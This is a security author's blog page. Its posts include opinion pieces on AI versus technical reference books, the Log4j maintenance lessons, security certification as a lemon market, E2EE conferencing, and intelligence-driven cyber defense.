Do we still need technical reference books?

Given the fact that AI tools like ChatGPT are able to generate texts on the fly, one may wonder whether we still need technical reference books (that are produced over an overlong period of time), or whether they may have become obsolete. As a book series editor and author, this question directly affects me and the prioritization of my work.

First, I want to make a difference between knowledge and understandig:

  • Knowledge is the ability to recall information stored somewhere. In the case of human beings, such information is acquired through education and experience (in addition to information that is already present at birth). Anyway, the information is stored in some sort of memory and can later be retrieved from there.
  • Understanding, on the other hand, not only requires knowledge, but also deepens it in terms of causes, meanings, interpretations, and implications. This is obviously more than information storage and retrieval, but it is difficult to precisely specify and nail down.

What IT and currently deployed AI technologies are good at is knowledge handling, i.e., information storage and retrieval, and the simulation of understanding. This simulation paradigm is at the core of the Turing test that has always been the benchmark for AI technologies (we are still looking for an alternative and maybe even better way to characterize intelligent machine behavior). Anyway, whether a machine is really able to understand is mainly a philosophical question and beyond this post.

Second, I want to use the terms “knowledge” and “understandig” to answer the title question. I therefore assume that the purpose of a technical reference book is to provide knowledge and understanding about a particular field of study. Knowledge can be easily provided artificially (there is no need for technical reference books here), but the provision of understanding is more involved and subtle. I think and firmly believe that somebody not understanding a particular topic is not able to provide respective understanding. As AI technologies are good at simulating understanding a topic without really understanding it, I think that a good technical reference book cannot be generated artificially (e.g., through AI technologies). In this context, “good” refers to a book written by an authoritative person, i.e., somebody knowing and deeply understandig the subject matter. If somebody wants to get into a topic, there is simply no alternative to a good technical reference book. Consequently, the title question must be answered in an affirmative way. There are, however, two caveats:

  • On the one hand, the positive assessment only applies to the first technical reference books written on a partiular topic. As soon as there are several books, the AI machinery of copying and pasting text segments (maybe even modifying them to circumvent any copyright infringement) may work and serve the same purpose.
  • On the other hand, the positive assessment not only applies to technical reference books, but also to other forms of knowledge and understanding transfer, such as overview articles, podcasts, audio books, learning videos, or whatever comes next.

Against this background, I think that it is still useful to invest in technical reference books – either on the producing or consuming side – and that the value of good books cannot be overestimated. This insight is soothing and affirmative for my work, and I therefore continue it with a good conscience.

Posted in Uncategorized | Leave a comment

Signal Protocol in 1 Slide

Posted in Uncategorized | Leave a comment

E2EE Messaging in 1 Slide

Posted in Uncategorized | Leave a comment

Cyber Risk Management

A short article (column) entitled “How To Manage Cyber Risks – Lessons Learnt from Medical Science” will appear in the January 2023 issue of the IEEE Computer magazine. The article is co-authored by Andreas Grünert, and it continues some lines of thought that have their roots in a 2015 article in the IEEE Security & Privacy magazine (entitled “Quantitative Risk Analysis in Information Security Management: A Modern Fairy Tale”) and a 2017 guest editor’s introduction for an IEEE Computer magazine special issue on risk management (entitled “New Frontiers: Assessing and Managing Security Risks” and co-authored by Günther Pernul and Sokratis Katsikas). The soon to be published article explains why cyber risk management based on a threats-and-vulnerabilities analysis doesn’t work in the field, and how cyber risks can be managed instead. The suggested approach is conceptually related to medical science, and how a doctor typically manages the risks that refer to his or her patients’ health state. There are many things that can be learnt from this analogy.

Posted in Uncategorized | Leave a comment

Lessons learnt from Log4j

The recent Log4j turmoil has revealed severe problems and structural difficulties in the way we develop and market software. Very frequently, some open source software components, like the Log4j library, are built into larger software products and may even become integral – but highly invisible – parts of critical applications. People hope that Linus’s law that “given enough eyeballs, all bugs are shallow” applies, whereas in reality it does not – at least not in absolute terms. In fact, I would argue that all (non-trivial) software components comprise bugs, and there is hardly anything that can be done about it. In particular, this fact is independent from the economic model of software development; it equally applies to open source and proprietary software. Its openness does not magically make software more secure. The “many eyeballs” that may find bugs do not necessarily focus on bug-finding processes. Instead, these processes tend not to be on the top priority lists of software developers. They rather prefer to spend their time on more interesting and challenging tasks, like implementing new features and functions. This means that some (subtle) bugs still prevail, and that Log4j yields no exception here.

The most obvious lesson learnt from Log4j is that every software component is important from a security perspective. You cannot build secure software on top of insecure components. If a component is built into a product, then it is important that this component is equally secure than the other components. Otherwise, it will become the weak link that breaks the entire system. Another – maybe less obvious – lesson is that it is not primarily about creating software; rather, it is about maintaining and steadily improving it. This must be a professional activity that needs to be funded in some way. This is well understood in companies that develop and sell proprietary software; it is less well understood in other circles. In lack of funding, open source software will suffer the tragedy of the commons and not be maintained and improved professionally. This means that old bugs (or features) will yet be shallow but still hit us badly. The Log4j story will be continued soon (starring another software component); stay tuned.

Posted in Uncategorized | Leave a comment

Can a Lemon Market Remdey a Lemon Market?

It is commonly agreed that the market for cybersecurity products and services is what economists call a lemon market (according to the 1970 work of the economist George Akerlof who was jointly received the prestigious Nobel Memorial Prize in Economic Sciences with Michael Spence and Joseph Stiglitz in 2001), and people sometimes argue that certification may remedy the situation.

In this note, I contradict this argument, mainly because the market for certificates is itself a lemon market. So the key question is: Can we remedy a lemon market by putting in place another lemon market, or do we need something else? To reasonably argue about this question, one has to first look at the market for certificates as it stands today.

Since the early 1980s, people have tried to define criteria to evaluate and certify the security of computer systems used for the processing, storage, and retrieval of sensitive or
even classified information. In 1983, for example, the U.S. Department of Defense (DoD) released the Trusted Computer System Evaluation Criteria (TCSEC), frequently referred to as the Orange Book. In 1998, the European Union published its Information Technology Security Evaluation Criteria (ITSEC) based on previous work done in Germany, France, the United Kingdom, and the Netherlands. These and a few other initiatives finally culminated in the Common Criteria (CC) that refer to internationally agreed and standardized criteria to evaluate and certify the security of computer systems. Unfortunately, the CC are not self-contained, meaning that every nontrivial set of functionalities requires a protection profile (PP), against which the CC can be applied. These PPs are usually defined by the largest maufacturers in the respective field, and hence they tend to be a little bit biased towards what can be done by the leading products. Also, certificates issued in the context of a CC PP are usually hard to understand by the customers. The situation is far away from being mature and satisfactory for both the manufacturers and the customers.

A similar lack of maturity applies to cerzificates issued for information security management systems (ISMS) according to ISO/IEC 27001. The systems can be customized and fine-tuned according to their scopes and statements of applicability, and hence one has to exactly look at what an ISO/IEC 27001 certificate is actually standing for. It does not necessarily stand for best practices and a reasonable level of security in all cases. As is usually the case in security, the devil is in the details.

In all types of certificates that are currently on the market, including the CC and ISO/IEC 27001, the owner of the certificate pays for the evaluation and certification processes done by some accredited body. This is expensive and time-consuming. Consequently, almost all actors go for a a body that is minimally invasive. This means that the body that makes the best offer is usually going to win the competition. This means that the market in driven by pricing, and that low-priced offerings are always preferred. This is exactly how a lemon market works and downgrades quality in the long term.

The bottom line is that we have a lemon market for cybersecurity products and services that we want to remedy with another lemon market for certificates. This is not going to work. The manufacturers of low-security products and services are always going to find a body that takes a loose stance and doesn’t really question the security promises of the products and services they look at. They will find something (they have to, because they are paid for it), and everybody is happy, if the findings are not too embarassing. Even the customers like a positive statement in favor of security. The economic incentives are not going to change, unless the customers pay for the evaluation and certification. This, however, is illusionary and not going to happen. So we have to live with the situation that security certificates are neither expressive nor particularly useful, and we have to find other means to convince us about the security of a product or service. This is not simple, but needed in the field.

Posted in Uncategorized | Leave a comment

Is E2EE Conferencing Meaningful?

In these days, my new book entitled End-to-End Encrypted Messaging is being printed and prepared to be shipped. Due to this fact, but mainly due to the Corona crisis, I am often asked these days whether the various conferencing tools that are used worldwide, such as Zoom and Microsoft Teams, are reasonably secure and adhere to the state of the art. The short answer is “no,” but it makes a lot of sense to scrutinize both the question and the answer.

With regard to the question, the first counterquestion I would ask is why would you want to encrypt a conference in the first place, especially if the conference has many participants. Remember the famous quote attributed to Benjamin Franklin: “Three may keep a secret if two of them are dead.” It seems exaggerated, but the bottom line is still that keeping a secret becomes increasingly difficult, the more people are to share it. One may argue about the threshold, and the quote is overly pessimistic here, but beyond only a handful or persons it seems very unlikely that a secret can ever be kept secret. This, in turn, means that secure – maybe even E2EE – conferencing is meaningful for small groups, but certianly becomes more and more pointless the larger the group is. Note that any group member can tape the audio and/or video streams and redistribute them at will. If we are talking about dozens, hundreds, or even thousands of particpants in a large conference, then encrypting it may be a nice engineering execise, but its actual value may be small. The information is going to leak anyway, even if E2EE. This insight is just a consequence of human behavior and its (in)ability to keep secrets.

With regard to the answer, I am more optimistic. In spite of the fact that most conferencing tools are not truely end-to-end encrypting and have sometimes even devastating shortcomings (e.g., Zoom seemingly encrypting with AES-128 in ECB mode), cryptographic research has come up with E2EE protocols that are highly secure and permanently refresh their keying material, such the Signal protocol that is also used in WhatsApp, Facebook Messenger, and many more. This protocol is optimized for the asynchronous setting, but it works equally well in the simpler case of the (synchronous) setting of a conference. Some messengers are already using this protocol for small-group conferencing (e.g., WhatsApp for groups up to 4 members). Furthermore, the community (in particular the IETF MLS WG) is working on a messaging layer security (MLS) protocol that is particularly well suited for large groups with thousands of members. This protocol can be used for E2EE messaging, but it can also be used for E2EE conferencing. So from a technical persepctive, the problem of how to implement E2EE messaging and conferencing in a scalable way seems to be solved. The remaining question is how reasonable and meaningful it is to use it and end-to-end encrypt large conferences. My personal impression is that secret information should not be discussed in large conferences, and hence currently deployed messengers (that support groups up to a few members) are sufficient here.

If you still want to use an E2EE conferencing tool, then it makes sense to study the details. As is usually the case in security, the devil is really in the details and they make the difference. In times like today, marketing departments are good in putting together various buzzwords and acronyms (like E2EE) to make product sheets as interesting and promising as possible. It is therefore important to stay critical and ask the right questions. E2EE conferencing may not be the appropriate solution in all situations.

Posted in Uncategorized | Leave a comment

New Book Released Soon

My new book about secure and end-to-end encrypted (E2EE) messaging will be released soon. It addresses E2EE messaging protocols, like OpenPGP and S/MIME, as well as OTR, Signal, iMessage, Wickr, Threema, Telegram, and many more. The core of the book is the Signal protocol that represents the state-of-the-art in E2EE messaging as it stands today. Besides the Signal messenger, it is also used in WhatsApp, Viber, Wire, and the Facebook Messenger. The book can be ordered from Artech House UK or US.

Posted in Uncategorized | Leave a comment

Intelligence-Driven Cyber Defense

In a 2015 article, I argued that conventional wisdom in information security management is deeply flawed, because it requires a risk-based approach knowing well that any form of risk analysis – be it quantitative or qualitative – is somehow arbitrary and therefore largely useless. But in spite of this argument, most information officers and managers still continue to ask for compliance and audit (some organizations have even made their information security officer to also become a compliance manager). Most efforts being spent on information security management are therefore wasted, meaning that the respective labor is Sisyphean.

In this post, I want to continue this line of argumentation by proposing something that may replace risk-based information security management anytime in the future. For the lack of a better term, I call it intelligence-driven (instead of “risk-based”) cyber defense (instead of “information security management”).

  • The first part of the term should make it clear that any form of risk analysis is better replaced with intelligence, meaning that information security can only be achieved if one knows what is going on in a particular information technology (IT) infrastructure. Without this knowledge, one is blind and doomed to fail. Intelligence is key to anything related to security.
  • The second part of the term should make it clear that cyber security takes place in a game-theoretic setting, in which there is an offence – represented by the adversaries – and a defense. A security professional’s job is to defend the IT infrastructure of his or her employer, i.e., make sure that no adversary is able to successfully mount an attack. This job is very comparable to a defender’s job in a soccer team. It doesn’t matter, whether the next offensive is launched by a wing player or the center forward; a good defense must mitigate either of them. There is no use in arguing about probabilities: If most of the times, an opposing soccer team attacks with the center forward, then this does not mean that the defense can count on that and forget about the wing players in the next offensive. Instead, a good defense must be prepared to anything, independent from any probability, and it must be able to react dynamically and situationally. The same line of thinking applies in cyber security: It is mainly about mitigating all possible attacks.

Putting the parts together, I think that future information security management needs to be intelligence-driven, and that the ultimate goal must be to set up a solid and profound cyber defense. It goes without saying that this requires a major mind change in future generations of information security professionals. We have to move away from risk analysis to mechanisms and tools that allow us to gather as much intelligence as possible and to use it properly and wisely. We also have to take the stance of a good defense: Be prepared to anything, even if it is highly unlikely and unprobable.

Posted in Uncategorized | Leave a comment

CALL FOR QUESTIONS

CRYPTOlog

I have added a cryptology blog named CRYPTOlog to the Web site of eSECURITY Technologies Rolf Oppliger (cryptolog.esecurity.ch). The aim is to answer questions related to cryptology that are of common interest. I am looking forward to receive many interesting questions to answer.

Posted in Uncategorized | Leave a comment